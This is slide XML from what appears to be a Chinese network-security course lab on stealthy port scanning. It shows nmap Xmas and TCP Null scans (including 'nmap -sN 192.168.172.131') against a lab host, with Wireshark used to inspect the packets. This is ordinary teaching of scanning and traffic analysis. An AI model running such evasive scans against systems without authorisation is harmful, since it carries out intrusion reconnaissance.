            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="301942"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>7.回到Wireshark工具查看nmap 发送的数据包，这些发送的数据包中都含有FIN、PSH、URG标志，如图2-2-53所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="1223962"/>
            <a:ext cx="5276850" cy="4105275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472430" y="5329238"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-53 nmap发送的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667885" y="5739130"/>
            <a:ext cx="7350760" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8.从扫描结果可以看出21、22、80等多个端口都是open|filtered状态，根据RFC 793规定，这些端口是开放的，但是扫描结果以open|filtered标识，nmap无法区别端口处于open状态还是filtered状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671195" y="3221038"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>9.打开终端的Wireshark工具对本地网卡进行监听，如图2-2-54所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671195" y="3866198"/>
            <a:ext cx="5276850" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="文本框 111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6220460" y="405448"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.用“nmap -sN 192.168.172.131”命令对目标主机进行TCP Null 扫描，如图2-2-55所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277610" y="1050608"/>
            <a:ext cx="5276850" cy="5076825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="文本框 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277610" y="6127433"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-55 TCP Null 扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505585" y="5409565"/>
            <a:ext cx="3191510" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图2-2-54 打开Wireshark工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
